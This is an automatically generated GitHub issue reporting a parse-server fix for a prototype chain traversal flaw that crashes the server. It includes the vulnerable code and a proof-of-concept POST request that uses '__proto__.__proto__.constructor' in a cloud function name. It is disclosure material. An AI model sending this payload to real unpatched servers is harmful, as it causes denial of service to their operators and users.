Skip to content

[Vulnerability] parse-community/parse-server: Prototype Chain Traversal (Server Crash / Denial of Service) #168

Description

@github-actions

Potential Security Vulnerability Detected

Repository: parse-community/parse-server
Commit: 286373d
Author: Manuel
Date: 2026-03-15T17:13:30Z

Commit Message

fix: Cloud function dispatch crashes server via prototype chain traversal ([GHSA-4263-jgmp-7pf4](https://github.com/parse-community/parse-server/security/advisories/GHSA-4263-jgmp-7pf4)) (#10210)

Pull Request

PR: #10210 - fix: Cloud function dispatch crashes server via prototype chain traversal (GHSA-4263-jgmp-7pf4)
Labels: state:released-alpha

Description:

Issue

Cloud function dispatch crashes server via prototype chain traversal ([GHSA-4263-jgmp-7pf4](GHSA-4263-jgmp-7pf4))

Tasks

  • Add tests
  • Add changes
  • Add entry to changelog

Analysis

Vulnerability Type: Prototype Chain Traversal (Server Crash / Denial of Service)
Severity: High

Description

Before the patch, an attacker could invoke cloud functions with crafted names containing prototype chain traversal segments (e.g., 'proto') enabling them to access internal object properties like constructor functions. This would cause the server to crash during the dispatch process, leading to a denial of service. The patch prevents traversal beyond own properties, blocking such malicious function names and ensuring server stability.

Affected Code

function getStore(category, name, applicationId) {
  _triggerStore[applicationId] = _triggerStore[applicationId] || baseStore();
  let store = _triggerStore[applicationId][category];
  for (const component of path) {
    store = store[component];
    if (!store) {
      return createStore();
    }
  }

Proof of Concept

POST http://localhost:8378/1/functions/legitimateFunction.__proto__.__proto__.constructor
Headers:
  Content-Type: application/json
  X-Parse-Application-Id: test
  X-Parse-REST-API-Key: rest
Body: {}

Expected behavior before patch: Server crashes or becomes unresponsive.
Expected behavior after patch: HTTP 400 response with error indicating invalid function, server remains stable.

This issue was automatically created by Vulnerability Spoiler Alert.
Detected at: 2026-03-15T18:00:41.255Z

Metadata

Metadata

Assignees

No one assigned

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions